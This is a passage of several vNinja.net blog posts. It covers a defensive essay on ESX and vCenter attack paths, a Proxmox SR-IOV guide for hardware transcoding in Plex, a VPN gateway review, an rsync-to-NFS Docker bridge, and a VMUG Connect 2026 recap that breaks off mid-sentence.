# vNinja.net | VMware, VCF & Homelab > --- # ESX Security Advice that Actually Matters in 2026 URL: https://vNinja.net/2026/05/12/esxi-security-advice-that-actually-matters-in-2026/ Date: 2026-05-12 Author: christian Tags: vmware, vcf, virtual-infrastructure, attack-surface, identity, security-model VMware ESX runs directly on physical hardware as a type-1 hypervisor that sits beneath all virtual machines and arbitrates their access to CPU, memory, storage, and networking. Every workload in the environment ultimately depends on it, meaning that compromising ESX is not just gaining access to a single system but gaining control over the entire virtualized infrastructure. From that position, an attacker can start, stop, modify, or observe VMs, manipulate virtual disks, and effectively operate outside the visibility of most guest-based security controls. This is why ESX is consistently considered a high-value target in security discussions: it concentrates control of many critical systems into a single layer, making any compromise disproportionately impactful. There is no shortage of ESX security advice out there. If you search for it, you will find the same ideas repeated in slightly different forms: long checklists, hardening guides, compliance-driven baselines, and “best practices” that converge on a familiar formula. Disable what you can, patch what you must, restrict everything, and assume that enough configuration equals security. On paper, it looks complete. Structured even. In practice, it rarely reflects how environments actually fail. At a certain point, ESX security stops being a question of host configuration and becomes a question of reachability and control. Not what is enabled on the hypervisor itself, but who can reach it, how they got there, and what else they already control by the time they do. Most ESX security incidents do not begin with a hypervisor exploit. They begin much earlier in the chain, usually through identity issues, exposure creep, or assumptions about network trust that no longer match how environments are actually operated. Once you have seen enough real-world cases, the pattern becomes hard to ignore. ESX is rarely the entry point. It is where control is consolidated after everything else has already gone wrong. This theme also shows up in operational discussions from VMUG Connect 2026 in Amsterdam, especially around the gap between designed security models and how infrastructure behaves in reality. The actual attack path model # Most ESX environments do not break in a straight line. They fail through a predictable control chain that gradually expands access until ESX is no longer meaningfully protected. flowchart LR A[Identity - AD / SSO / Credentials] --> B[vCenter Server] B --> C[ESX Hosts] C --> D[Backups & Recovery Systems] Once identity is compromised, vCenter becomes reachable. Once vCenter is reachable, ESX is effectively under administrative control. From there, backups become the final boundary that determines whether recovery is possible at all. The important detail is not the sequence itself, but how quickly it collapses once identity is no longer trustworthy. ESX is almost never where the story begins # In environments that actually get compromised, ESX is rarely the first system involved. It is almost never the initial point of entry and often not even the second. Instead, it sits further down the chain, waiting until other assumptions in the environment have already failed. Initial access is usually far less interesting than people expect. It is rarely a targeted hypervisor attack and more often a sequence of ordinary failures that accumulate over time. A compromised administrative account that was never rotated, reused or leaked credentials that still work across systems, phishing that was only partially contained, or management interfaces that quietly became reachable as networks evolved. By the time an attacker interacts with ESX, they typically already have what matters: valid credentials, network reach, or access to vCenter. At that point, ESX is no longer being broken into. It is being accessed through paths that were never properly constrained in the first place. ESX access paths also do not always align with modern identity expectations. While vCenter can integrate with federated identity systems and multi-factor authentication, ESX itself still exposes local and SSH-based access paths that rely on direct credential validation. This is a key difference in how authentication behaves across the stack. ESX does not natively enforce multi-factor authentication on these direct management interfaces. In practice, that means SSH or local console access is typically protected only by username and password, even in environments where the broader identity layer is fully federated. Once valid credentials exist for those paths, authentication is complete. No additional identity verification layer is applied at the host level. This pattern is consistent with incident analysis such as It is All Fun and Games Until Someone Gets Root, where the meaningful failure happens long before the final escalation event and attackers start utilizing Living Off the Land Techniques. This also aligns with attacker behaviour models described in MITRE ATT&CK. Exposure is still the thing that breaks environments # If there is one recurring theme across ESX incidents, it is exposure. Not theoretical vulnerabilities, but practical reachability problems that evolve slowly over time. Security thinking often fails here because each individual change feels reasonable in isolation. A routing exception, a temporary admin path, a network shortcut that was meant to be short-lived but never revisited. None of it looks dangerous on its own, but over time it becomes something else entirely. Management interfaces that were meant to remain isolated gradually become reachable as networks evolve. VPNs start behaving as implicit trust boundaries. Internal networks are treated as safe by default. Jump hosts exist, but are not consistently enforced. Individually, none of these decisions feel significant. Taken together, they define whether ESX is actually protected or merely assumed to be protected. The uncomfortable truth remains simple: Most compromises do not require breaking ESX. They require reaching it. vCenter quietly becomes the real target # Although this discussion is framed around ESX, it rarely ends there. In most environments, vCenter sits at the center of operational control. If vCenter is compromised, ESX security becomes largely irrelevant in practical terms. At that point, ESX is no longer the point of control. It is the execution layer for decisions made elsewhere in the environment. This is explored in more detail in vCenter Is the Real Crown Jewel, where the control-plane impact is examined in context of real compromise behavior and management-plane access paths. Official guidance: Securing ESX hosts Securing vCenter The small set of things that actually matter # Management plane isolation, identity control, backups, visibility, and segmentation determine most outcomes. Each of these only matters in practice when it is enforced consistently, not assumed by design. Visibility is still the hardest problem # There is a recurring assumption in ESX environments that logging equals visibility. In practice, the gap between the two is still significant. ESX does generate logs across multiple subsystems, but they are fragmented, distributed, and not designed for straightforward operational monitoring. Even basic investigation often requires correlating events across multiple files and services, and that assumes you already know what you are looking for. A useful reference for how ESX logging is structured highlights this complexity directly: https://knowledge.broadcom.com/external/article/306962/location-of-esxi-log-files.html The practical reality is that ESX logs are rarely consumed continuously. They are typically collected centrally, if at all, and used in retrospective analysis rather than real-time detection. That creates a structural delay between activity and understanding. In other words, ESX is observable, but not easily operationally observable. This becomes more important as attack patterns shift toward quieter lateral movement and credential-driven access rather than noisy exploitation. Without strong correlation across identity, vCenter, and host-level activity, most environments are effectively blind until after the fact. Moving toward hypervisor-level telemetry # This visibility gap is also being acknowledged at the platform level. With vSphere in VMware Cloud Foundation 9.1, ESX is beginning to support deeper integration with third-party endpoint detection and response tooling directly at the hypervisor layer. This includes the ability to observe process activity, file system changes, and network events within the ESX execution context. EDR Integration: Secure, supported framework allowing third-party EDR agents to integrate directly into the ESX hypervisor, enabling leading EDR platforms to natively analyze process, file, and network events for suspicious activity right at the foundational layer for granular, high-fidelity visibility into guest OS behavior and workload activity https://www.vmware.com/docs/vmw-vsphere-datasheet How this will look going forward is still uncertain, but it shows intent from VMware by Broadcom to further secure ESX on the appliance/hypervisor layer. CVEs matter, but not in isolation # ESX vulnerabilities tend to attract attention when they appear, especially high-impact issues affecting management services or guest escape paths. But real-world impact depends heavily on context. A vulnerability requiring authentication behaves very differently from a pre-authentication remote exploit. A host-level issue is not equivalent to a control-plane compromise path. And none of it matters if the system is not reachable in the first place. For reference, vulnerabilities are tracked through public CVE databases and vendor advisories: https://www.cve.org/CVERecord/SearchResults?query=esxi+and+esx https://www.vmware.com/security/advisories.html In practice, prioritisation tends to follow a simpler model than most frameworks suggest: exposure first, exploitability second, severity last. This is closer to how incidents actually unfold than how vulnerability reports are usually consumed. What compromise actually looks like # SSH changes without operational intent, snapshots created outside expected workflows, configuration drift across hosts, datastore anomalies, or API activity that does not match administrative behaviour. Individually, none of these confirm compromise. Together, they tend to form a pattern that only becomes obvious after the fact. Closing thought # Most environments are not compromised because of zero-days. They’re compromised because the management plane was reachable. ESX security is often treated as a hardening problem. In practice, it behaves more like an access problem layered on top of an operational system. Don’t get me wrong, hardening is important but it’s not the be-all and end-all it is made out to be. The real question is not how many controls are enabled or disabled. It is whether the management plane is actually constrained in practice, and whether you would notice quickly if that assumption stopped being true. That is what actually matters in 2026. --- # VCF Security Reality Check: What This Series Covers URL: https://vNinja.net/2026/05/12/vcf-security-reality-check/ Date: 2026-05-12 Author: christian Tags: vmware, vcf, virtual-infrastructure, attack-surface, identity, security-model This series looks at security in VMware Cloud Foundation environments through three connected layers: ESX as the execution layer vCenter as the control layer Identity as the reachability layer It does not attempt to cover every component in the VCF stack. NSX/vDefend, vSAN, and other services may exist in these environments, but they are not the focus here. The focus is narrower, and intentionally so. Most real-world compromise scenarios in virtualized infrastructure do not begin with individual product weaknesses. They begin with access paths that already exist, and identity that already works. From there, control expands through normal administrative interfaces rather than through exploitation of isolated components. This series assumes that model from the start. It also assumes that compromise is more likely to occur through valid access than through broken systems. That distinction is important, because it changes where security effort actually matters in practice. The industry still over-focuses on exploits # Most public discussion around VMware security revolves around patching, CVEs, and the possibility of hypervisor-level exploits. Those things matter. But they also receive disproportionate attention because they are visible, measurable, and easy to communicate. Real-world compromise paths are usually less dramatic. Most environments are not lost because attackers discovered an unknown ESX vulnerability. They are lost because identity, management access, segmentation, and operational trust relationships quietly drifted into reachable states over time. In practice, compromise is far more likely to happen through valid access than through novel exploitation. That distinction matters because it changes where defensive effort actually produces meaningful risk reduction. How to read this series # Each post focuses on one layer of the model: ESX — execution and why it is a high-value target vCenter — control concentration and operational impact (not published yet) Identity — reachability, federation, and access paths (not published yet) Closing the loop — how identity, vCenter, and ESX connect into a single attack path model, and what it means when the entire control plane is viewed as one continuous system rather than separate security domains (not published yet) Together, they describe how control behaves in practice once environments scale beyond a single system. Core assumption # The underlying assumption throughout is simple: If identity is valid, the rest of the stack behaves as designed. ESX executes instructions. vCenter defines operational intent. Identity determines whether either becomes reachable at all. Closing note # This is not a compliance guide, and it is not a configuration checklist. It is a model of how control actually behaves once infrastructure is in use, in the real world. --- # Intel Arc SR-IOV Hardware Transcoding with Plex on Proxmox VE URL: https://vNinja.net/2026/05/07/intel-arc-sr-iov-hardware-transcoding-with-plex-on-proxmox-ve/ Date: 2026-05-07 Author: christian Tags: proxmox, plex, intel, sr-iov, nuc My homelab has three new additions: ASUS NUC 15 Pro units, each with an Intel Core Ultra 7 255H CPU. They are surprisingly capable machines, and getting proper hardware transcoding working in Plex using the built-in Intel® Arc™ 140T GPU was high on the list. It took longer than expected to get it all sorted, but the end result is solid. All three NUCs run Proxmox VE 9.x in a cluster. The Intel Core Ultra 7 255H has an Intel Arc iGPU based on the Arrow Lake-P architecture, with PCI device ID 8086:7d51. This is an integrated GPU sharing the same die as the CPU, which matters for how passthrough works. What is SR-IOV and Why Use It? # The obvious approach for GPU passthrough is to assign the entire GPU to a single VM. That works, but it creates a strict 1:1 relationship. One GPU, one VM, host loses access entirely. No display output from the NUC, no GPU for other VMs or containers, a permanent commitment of the hardware to one workload. SR-IOV (Single Root I/O Virtualization) solves both problems. A single physical GPU presents itself as multiple independent virtual devices simultaneously. The host keeps the physical function, so display output works normally. Up to 7 additional virtual functions can be assigned to different VMs or containers at the same time, giving a total of 8 GPU devices: one for the host and seven for guests. Each virtual function gets access to the full GPU execution engines, but time on those engines is scheduled dynamically based on demand. When only one VM is transcoding, it gets full GPU bandwidth. When multiple VMs are active, the GPU scheduler divides time between them automatically. No hard per-VF resource guarantees, closer to CPU time-sharing than static partitioning. In practice for a Plex server in a homelab this works well, since transcoding workloads are bursty rather than constant. SR-IOV on Intel integrated GPUs is not enabled in the stock Linux driver. It requires a patched version of i915, which is what the i915-sriov-dkms project provides. Host Setup # The first hurdle was the BIOS. On the NUC 15 Pro, the virtualization settings are not where you would expect on a desktop board. VT-d is under Security rather than Advanced, and the Virtual Display Emulation setting (which keeps the iGPU active with no monitor connected) is under Advanced > Video. Both are required. On the Proxmox side, three things need to be in place: i915-sriov-dkms patches the i915 kernel driver to enable SR-IOV virtual functions. Version 2026.05.06 supports Proxmox kernel 6.17 through 7.0. Always check the releases page for the latest version and supported kernel range before upgrading the host kernel. Kernel parameters tell i915 to claim the Arrow Lake GPU and prevent the newer xe driver from taking it first. The force_probe=7d51 flag targets the exact device ID, module_blacklist=xe keeps xe out, and i915.max_vfs=7 sets the number of virtual functions. A systemd service loads i915 and creates the virtual functions at boot. Sysfsutils turned out to be unreliable here since i915 needs to be fully loaded before the VF count can be set, and the ordering is not guaranteed without an explicit dependency chain. The systemd service handles this cleanly. After a reboot: eight VGA devices in lspci, one physical function on the host, seven virtual functions ready to assign. ~# lspci | grep VGA 00:02.0 VGA compatible controller: Intel Corporation Arrow Lake-P [Intel Graphics] (rev 03) 00:02.1 VGA compatible controller: Intel Corporation Arrow Lake-P [Intel Graphics] (rev 03) 00:02.2 VGA compatible controller: Intel Corporation Arrow Lake-P [Intel Graphics] (rev 03) 00:02.3 VGA compatible controller: Intel Corporation Arrow Lake-P [Intel Graphics] (rev 03) 00:02.4 VGA compatible controller: Intel Corporation Arrow Lake-P [Intel Graphics] (rev 03) 00:02.5 VGA compatible controller: Intel Corporation Arrow Lake-P [Intel Graphics] (rev 03) 00:02.6 VGA compatible controller: Intel Corporation Arrow Lake-P [Intel Graphics] (rev 03) 00:02.7 VGA compatible controller: Intel Corporation Arrow Lake-P [Intel Graphics] (rev 03) Note vainfo does not work on the Proxmox host itself. The physical GPU function is claimed by i915 for SR-IOV management, not media. Run vainfo inside the VM to verify the VF is working. Proxmox Host Setup Commands # Detailed Instructions Note Perform these steps on each Proxmox host independently. BIOS Settings # Location Setting Value Security > Security Features Intel Virtualization Technology (VT-x) Enabled Security > Security Features Intel VT for Directed I/O (VT-d) Enabled Advanced > Video Virtual Display Emulation Enabled Boot Secure Boot Disabled Boot Fast Boot Disabled After saving, perform a full cold boot. Verify IOMMU # dmesg | grep -e "IOMMU enabled" -e "Directed I/O" Expected output: DMAR: IOMMU enabled DMAR: Intel(R) Virtualization Technology for Directed I/O Install i915-sriov-dkms # apt update && apt install -y dkms build-essential apt install -y pve-headers-$(uname -r) wget -O /tmp/i915-sriov-dkms.deb \ "https://github.com/strongtz/i915-sriov-dkms/releases/download/2026.05.06/i915-sriov-dkms_2026.05.06_amd64.deb" dpkg -i /tmp/i915-sriov-dkms.deb dkms install i915-sriov-dkms/2026.05.06 -k $(uname -r) --force dkms status Configure Kernel Parameters # Edit /etc/default/grub and set GRUB_CMDLINE_LINUX_DEFAULT to: GRUB_CMDLINE_LINUX_DEFAULT="quiet intel_iommu=on iommu=pt i915.enable_guc=3 i915.max_vfs=7 i915.force_probe=7d51 module_blacklist=xe" Then apply: update-grub update-initramfs -u -k all Create SR-IOV Boot Service # cat > /etc/systemd/system/i915-sriov.service << 'EOF' [Unit] Description=Intel i915 SR-IOV VF Setup After=systemd-modules-load.service After=local-fs.target [Service] Type=oneshot RemainAfterExit=yes ExecStart=/sbin/modprobe i915 ExecStartPost=/bin/sh -c 'sleep 2 && echo 7 > /sys/bus/pci/devices/0000:00:02.0/sriov_numvfs' [Install] WantedBy=multi-user.target EOF systemctl enable i915-sriov reboot Verify After Reboot # lspci | grep VGA | wc -l # Expected: 8 cat /sys/bus/pci/devices/0000:00:02.0/sriov_numvfs # Expected: 7 lspci -nnk -s 00:02.0 | grep "driver in use" # Expected: i915 systemctl status i915-sriov # Expected: active (exited) VM Setup and the Kernel # When creating the VM in Proxmox, a few settings are critical: Setting Value Why Machine type q35 Required for PCIe passthrough. The default i440fx does not support PCIe, so the VF cannot be exposed to the VM BIOS OVMF (UEFI) Required to control Secure Boot Pre-Enrolled Keys Unchecked Disables Secure Boot. The DKMS module is unsigned and will not boot with Secure Boot enabled Graphics Card VirtIO-GPU (default also works) Provides the VM console display independently of the passed-through VF CPU type host Exposes the real CPU to the VM, required for the i915 driver to work correctly Ballooning Disabled Recommended for GPU VMs. Dynamic memory reclamation can cause instability when a driver has pinned GPU memory The PCI device to add is 0000:00:02.1 (or another unassigned device ID 0000:00:02.x). Never use 00:02.0, that is the physical function which must stay on the host. PCI-Express checked, All Functions and Primary GPU left unchecked. Two Ubuntu versions have been tested and confirmed working: Ubuntu 26.04 LTS with the stock kernel 7.0, no extra steps needed Ubuntu 24.04 LTS with mainline kernel 6.17 from kernel.ubuntu.com Ubuntu 24.04’s default kernel 6.8 predates Arrow Lake SR-IOV VF support entirely, which is why the mainline kernel step is needed. Ubuntu 26.04 ships kernel 7.0 as its default and the DKMS module builds cleanly against it. An in-place upgrade from 24.04 to 26.04 is not yet available as of May 2026, so a fresh install is the only option for 26.04. The Proxmox hosts running kernel 7.0 does not mean Ubuntu 7.0 behaves identically. The i915-sriov-dkms module targets specific kernel builds, and Ubuntu’s packaging can differ enough to cause build failures. Always verify dkms status shows the module as installed before rebooting into a new kernel. Verification inside the VM with vainfo confirms the hardware pipeline is working: vainfo: Driver version: Intel iHD driver for Intel(R) Gen Graphics - 26.1.2 vainfo: Supported profile and entrypoints VAProfileH264Main : VAEntrypointVLD VAProfileH264Main : VAEntrypointEncSlice VAProfileHEVCMain : VAEntrypointVLD VAProfileHEVCMain : VAEntrypointEncSlice VAProfileAV1Profile0 : VAEntrypointVLD VAProfileAV1Profile0 : VAEntrypointEncSlice ... Both VLD (decode) and EncSlice (encode) entries for H264, HEVC, and AV1 confirm the full hardware pipeline is available. Plex VM Setup Commands # Detailed installation Note These steps apply to Ubuntu 26.04. For Ubuntu 24.04, install mainline kernel 6.17 from kernel.ubuntu.com before installing i915-sriov-dkms. Install build tools and DKMS # sudo apt update && sudo apt upgrade -y sudo apt install -y dkms build-essential wget gcc-14 linux-headers-$(uname -r) Install i915-sriov-dkms # Note Verify the latest version of i915-sriov-dkms and update the URL accordingly. wget -O /tmp/i915-sriov-dkms.deb \ "https://github.com/strongtz/i915-sriov-dkms/releases/download/2026.05.06/i915-sriov-dkms_2026.05.06_amd64.deb" sudo dpkg -i /tmp/i915-sriov-dkms.deb sudo dkms install i915-sriov-dkms/2026.05.06 -k $(uname -r) --force dkms status Configure i915 for the VF # sudo su - echo "options i915 force_probe=7d51" > /etc/modprobe.d/i915.conf echo "blacklist xe" >> /etc/modprobe.d/i915.conf update-initramfs -u exit sudo reboot Verify after reboot # uname -r lspci -nnk | grep -A3 "01:00.0" sudo dmesg | grep -i "sriov\|guc\|huc" | head -5 sudo vainfo --display drm --device /dev/dri/renderD128 Expected dmesg output: i915 0000:01:00.0: Running in SR-IOV VF mode i915 0000:01:00.0: GuC firmware PRELOADED i915 0000:01:00.0: HuC firmware PRELOADED Install Intel Media Stack # Note The Intel GPU repository uses resolute as the apt codename, which corresponds to Ubuntu 26.04. On Ubuntu 24.04 (codename noble), replace resolite with noble in the repository URL. wget -qO - https://repositories.intel.com/gpu/intel-graphics.key | \ sudo gpg --dearmor -o /usr/share/keyrings/intel-graphics.gpg echo "deb [arch=amd64 signed-by=/usr/share/keyrings/intel-graphics.gpg] \ https://repositories.intel.com/gpu/ubuntu resolute unified" | \ sudo tee /etc/apt/sources.list.d/intel-graphics.list sudo apt update sudo apt install -y vainfo intel-gpu-tools libva-drm2 libva-x11-2 \ libva-wayland2 va-driver-all intel-media-va-driver-non-free libigdgmm12 libva2 Install Plex Media Server 1.4.3.2 beta # Note Plex Pass required. Intel Arc iGPU hardware transcoding on Linux is not available in the current public release of Plex. Use the beta version below. sudo dpkg -i plexmediaserver_1.43.2.10687-563d026ea_amd64.deb sudo usermod -aG video plex sudo usermod -aG render plex sudo systemctl enable --now plexmediaserver Set hardware device path # sudo systemctl stop plexmediaserver sudo sed -i 's/HardwareDevicePath=""/HardwareDevicePath="\/dev\/dri\/renderD128"/' \ "/var/lib/plexmediaserver/Library/Application Support/Plex Media Server/Preferences.xml" sudo systemctl start plexmediaserver In the Plex web UI, go to Settings > Transcoder and enable both hardware acceleration options. Plex and Hardware Transcoding # Getting Plex to actually use the GPU was not as straightforward as expected. The VF was working, VAAPI was reporting full codec support, the plex user had access to the render device, hardware acceleration was enabled in settings. And yet Plex kept using software transcoding. The short version: the current public release of Plex Media Server does not support Intel Arc hardware transcoding on Linux. This caught me completely off guard, since the hardware side was working perfectly and everything pointed to a configuration problem rather than a Plex limitation. The fix is in the Plex Media Server 1.43.2.10687 beta, released on May 4, 2026 as a Plex Pass beta release. Plex Media Server Changelog # (Transcoding) Addressed issues hw transcoding on linux using an arrow lake igpu (PM-5197) Installing this version gets hardware transcoding working immediately. The Plex dashboard shows (hw) next to the active transcode, indicating that hardware transcoding is being used. To confirm hardware transcoding is actually running, check the transcoder statistics log while a stream is active: sudo grep "transcodeHw" \ "/var/lib/plexmediaserver/Library/Application Support/Plex Media Server/Logs/Plex Transcoder Statistics.log" | tail -3 A working setup shows transcodeHwFullPipeline="1" with both transcodeHwDecoding="vaapi" and transcodeHwEncoding="vaapi", confirming both encode and decode are running on the Intel Arc GPU through VAAPI. This is currently a beta release requiring an active Plex Pass subscription. It is expected to reach the public release channel in a subsequent update. Upgrading # The DKMS module and the Proxmox kernel are coupled. Before upgrading the Proxmox kernel, check whether the current DKMS version supports it. Install headers for the new kernel and verify the module builds successfully before rebooting. The dkms status output should confirm the module is installed for the new kernel version before committing to the reboot. The VM kernel is a separate concern. Do not upgrade the Ubuntu guest kernel through distribution channels expecting the same result as the host. Always verify dkms status after any kernel change and check the i915-sriov-dkms releases page for supported kernel ranges. After any Plex upgrade, verify the bundled iHD driver is still present: find /var/lib/plexmediaserver/ -name "iHD_drv_video.so" 2>/dev/null If hardware transcoding stops working after a Plex update, that is the first place to check. The Result # Three NUC hosts running Proxmox VE 9.x with kernel 7.0, i915-sriov-dkms 2026.05.06, and seven SR-IOV virtual functions each. Display output from the HDMI port works normally. Plex VMs confirmed working on both Ubuntu 24.04 with mainline kernel 6.17 and Ubuntu 26.04 with stock kernel 7.0, both running Plex Media Server 1.43.2.10687. Hardware transcoding confirmed working with a full VAAPI pipeline on all three hosts. VMs can be migrated between hosts with Proxmox offline migration using the force flag, live migration does not work when there is a PCI device assigned to the VM. Hardware transcoding works immediately on the destination host without any reconfiguration, since all three NUCs have identical hardware. --- # GL-iNet Brume 3 (GL-MT5000) VPN Security Gateway: Some Takeaways URL: https://vNinja.net/2026/04/21/gl-inet-gl-mt5000-vpn-security-gateway/ Date: 2026-04-21 Author: christian Tags: GL-iNet, Networking, MT5000, Brume 3 At the end of 2025 I received a GL-iNet Brume 3 (GL-MT5000) as part of a beta testing program, and it’s been quietly running in my home network ever since. I didn’t redesign my setup around it or do anything particularly fancy, I simply dropped it into the network alongside my existing gateway to see how it would behave in a real-world environment. It’s clearly designed to sit in the background and just do its job, rather than act as the centerpiece of a network. On paper, the specifications are surprisingly solid for something this compact. The standout feature is the combination of a reasonably capable quad-core CPU and full 2.5 GbE across all Ethernet interfaces. That alone makes it much more interesting than the typical small edge device. Description Details Interfaces 1 x WAN Ethernet port 2 x LAN Ethernet ports 1 x USB 3.0 port 1 x Type-C power port 1 x Reset button CPU MediaTek, Quad-core @2.0GHz Memory / Storage DDR4 1GB / eMMC 8GB Ethernet Speed 10/100/1000/2500Mbps Power Input Type-C, 5V/3A Power Consumption <5W Dimensions 75 x 92 x 25mm / 148g In practice, that translates to a device that feels a bit more “serious” than its size suggests. The 2.5 GbE ports in particular open up some interesting placement options, whether as a dedicated VPN gateway, a segmented lab router, or simply a high-speed edge node for specific traffic. Out of the box, it supports both OpenVPN and WireGuard, which makes it immediately useful without requiring any custom builds or deep configuration. WireGuard is where it really shines as the performance is excellent. One of my main use cases right now is running it as a dedicated VPN gateway for a subset of my network. Instead of routing everything through a tunnel, I selectively direct certain clients and VLANs through it. That keeps the rest of the network clean while still giving me flexibility where I need it, since I also use it as a “backup” Wireguard entrypoint to my home network. In fact, I route my rsync-to-nfs container traffic through a WireGuard tunnel handled by the Brume 3 for off-site backups. Compared to pushing the same workload through my UniFi UXG-Lite, the difference is significant and the Brume 3 simply outperforms it. The Brume 3 is built around a MediaTek quad-core CPU running at 2.0 GHz, giving it a solid amount of headroom for encrypted traffic and sustained throughput. In contrast, the UniFi UXG-Lite uses a Qualcomm IPQ5018 with a dual-core Cortex-A53 clocked at around 1.0 GHz. While that chip is perfectly adequate for routing and light gateway duties, it sits in a lower performance class and isn’t designed for sustained high-throughput VPN workloads. In practice, that gap becomes very noticeable with WireGuard. The Brume 3 benefits from both more cores and significantly higher clock speed, which translates into better handling of encryption and packet forwarding under load. The UXG-Lite, on the other hand, reaches its limits much sooner once real-world overhead is introduced, especially with sustained VPN traffic. That’s ultimately why the Brume 3 performs so much better in my setup. It isn’t doing anything magical, it simply has more CPU headroom for this kind of workload. Overall, the Brume 3 stands out most when it’s used for what it does best: VPN performance. It’s fast, consistent, and clearly built with encrypted traffic in mind, making it a strong choice for dedicated tunnels and off-site connectivity. At the same time, it’s important to recognize what it doesn’t try to be. Compared to something like the UniFi ecosystem, it lacks the slicker centralized management and the kind of unified control plane that makes managing multiple sites or devices much more streamlined. In that sense, it fits best as a focused, high-performance building block in a larger network rather than a full network management solution on its own. Ultimately, it comes down to selecting the right tool for the job, and for high-throughput VPN workloads, that’s where the Brume 3 really stands out. And yes, I know this comparison isn’t really fair. The UXG-Lite is not designed for this kind of VPN workloads, while the Brume 3 is. I think I might need to get my hands on a new Unifi Express 7 some time soon. --- # When Synology Says No: Building a Minimal rsync-to-NFS Bridge That Actually Works URL: https://vNinja.net/2026/04/08/when-synology-says-no-rsync-to-nfs/ Date: 2026-04-08 Author: christian Tags: rsync, nfs, docker, container, github There’s a special category of problems that only show up when everything looks like it should just work. This was one of them. The goal wasn’t ambitious. Back up a Synology NAS to a remote NFS share using Hyper Backup. No clever tricks, no exotic setup. Just something simple and predictable. Instead, I ran into one of those quiet limitations that turns a straightforward task into a dead end. Problem # Hyper Backup is pretty strict about where it writes data. Not a preference—more like a hard requirement: the destination has to be at the root of a volume. On its own, that doesn’t sound unreasonable. Until you bring NFS into the picture. Because Synology has its own opinion about that: NFS mounts always land inside a subfolder. No toggle, no workaround, no discussion. Which leaves you stuck between two perfectly valid rules that just don’t agree: The backup tool insists on a root-level destination The system won’t let you mount anything at root And suddenly, a basic backup setup turns into something you can’t actually build. How I fixed it # At some point it stopped making sense to fight Synology’s rules. Both sides were behaving exactly as designed, they just weren’t designed to work together. So instead of forcing it, I added a thin layer in between. The solution ended up being a small Docker container that acts as a bridge between rsync and NFS: It runs an rsync daemon It mounts the NFS export internally It writes whatever comes in straight to that mount From Synology’s point of view, nothing changed. It’s just talking to a regular rsync target. No special configuration, no weird tweaks. Behind the scenes, the container handles the translation and drops the data onto NFS. What makes this work is the separation: Hyper Backup knows how to talk rsync, not NFS The container handles that translation NFS stays exactly what it is: the storage layer No bending Hyper Backup into something it isn’t. Just giving it something it already understands.. Using It # The container is available here: https://github.com/h0bbel/rsync-nfs and the README file has all the details. The container image is published and ready to use: https://ghcr.io/h0bbel/rsync-nfs:latest https://hub.docker.com/r/h0bbel/rsync-nfs Run it, I’m running it on Synology itself in Container Manager but I’ve also tested running it “externally” without problems, point Synology’s Hyper Backup at it using rsync as the backup method, and suddenly the impossible destination becomes just another module. Container Contents # The container is intentionally minimal, the initial release is a total of 55.9 MB when extracted. Alpine-based image (3.23.3) rsync daemon frontend NFS mount handled at runtime Optional debug mode for visibility No unnecessary services or dependencies It’s designed to do one thing well, and stay out of the way while doing it. A Couple of Caveats # It requires privileged mode for NFS mounting In my testing mounting as NFS 4 works when running on Synology, NFS 4.1 does not work. If running on Synology, the external port for the container needs to be something else than default rsync port 873, since it is already in use on Synology (using this port is configurable in the Hyper Backup destination setup) It currently has no authentication added. Not for the rsync front end, or for the NFS mount. My setup doesn’t require it, but I might add it in a later version if there is a need for it. Workaround or adapter layer? Both? # This isn’t a workaround in the messy sense. It’s more of an adapter layer. Instead of forcing Synology to support remote NFS roots (which it won’t), we introduce something that fits neatly into both worlds. Sometimes the cleanest architecture isn’t the one that removes friction. It’s the one that contains it. Closing Thoughts # Not every system integrates cleanly with every other system, and that’s okay. I’m surprised that I couldn’t backup directly to a mounted NFS export, but that’s just how it is. The trick is recognizing when to bend the environment and when to insert a small, well-defined boundary that does the translation for you. In this case, a tiny rsync daemon turned out to be the missing piece. And once it’s in place, everything just works the way I want it to. --- # VMUG Connect 2026 Amsterdam – Security, Community, and the Reality of "Living with IT" URL: https://vNinja.net/2026/03/20/vmug-connect-2026-amsterdam-security-community-living-with-it/ Date: 2026-03-20 Author: christian Tags: VMUG, VMUG Connect, VMware This past week I attended VMUG Connect 2026 Amsterdam at RAI Amsterdam. This was the first VMUG Connect event ever held in Europe, and that alone made it a notable milestone. It also showed in the level of interest and around 550 attendees filled the venue, with sessions, hallways, and networking areas consistently busy throughout the event. VMUG Connect continues to be one of the more relevant gatherings for anyone working with VMware technologies. This year’s edition in Amsterdam built on that, with a clear structure around the themes “Thrive in Tech”, “Solutions in Action”, “Master VMware”, and “Get Hands-On”. The result was a focused program that reflected how people actually work with the platform—covering real challenges, practical approaches, and hands-on learning, without drifting into abstraction. The Strength of the Community # The community aspect remains the defining part of VMUG. Between sessions, during breaks, and throughout the event, conversations stayed grounded in real-world experience. Discussions weren’t about polished narratives, they were about how things actually work, what breaks, and how people deal with it. That openness is what makes these events valuable. It’s not just the sessions, it’s the ability to talk directly with peers who are solving similar problems. My Sessions # PreConnect: Security — All Things Security # The event opened with the PreConnect: Security — All Things Security panel, hosted by Yves Hertoghs, with the following co-panelists: Chris McCain (Broadcom) Marc van de Logt (PQR) Chris Mentjox (Broadcom) Dimitri Desmidt (Broadcom) Going into the session, the format itself was a bit of a surprise. I was expecting to be a part of a smaller discussion around security, but it turned out to be a panel discussion! That format worked well in the end—it created a more dynamic conversation, especially in a fully packed room. There was a lot of audience participation, and the interaction between the panel and attendees kept the discussion engaging throughout. It felt less like a presentation and more like a shared discussion, which fit the topic well. The discussion focused on how security is approached in real environments today. Rather than staying at a high level, the conversation stayed practical—covering challenges, trade-offs, and how teams are dealing with increasing complexity and pressure. Hypervisor Horror: Root Access and Regulatory Rage # Together with Stine Elise Larsen, I had the opportunity to present “Hypervisor Horror: Root Access and Regulatory Rage.” For Stine, this was her first international speaking session, which made the experience particularly meaningful. Presenting together on an international stage added an extra layer to the session. Thanks to everyone who attended, including the quite a few people who ended up with standing room only, who gave her a very warm welcome when I tried to throw her off a bit by pointing out that this was a first! Hint: She absolutely nailed it. The focus was on what happens at the hypervisor level when things go wrong—specifically how root access can. be abused within ESX environments. From there, the discussion moved into how native tools can be used for persistence and activity that blends in with normal operations. Detection and visibility remain the core challenge in these scenarios, especially when attackers rely on what’s already available within the system. Final Thoughts # VMUG Connect 2026 Amsterdam delivered exactly what you’d expect from a VMUG event. Focused sessions, practical content, and a strong community presence. Being the first Connect event in Europe made it feel like a meaningful addition to the calendar, especially given the absence of large-scale VMware events like VMware Explore Europe. It was a pleasure to attend, and meeting up with this many community members again in one place is something that I have been missing. The combination of practical sessions, real-world discussions, and a community that’s willing to share openly is what continues to make VMUG events relevant. Not polished. Not artificial. Just real, and that’s exactly why it works. Kudos to the VMUG team who made this happen, I am sure the Connect series will be back in 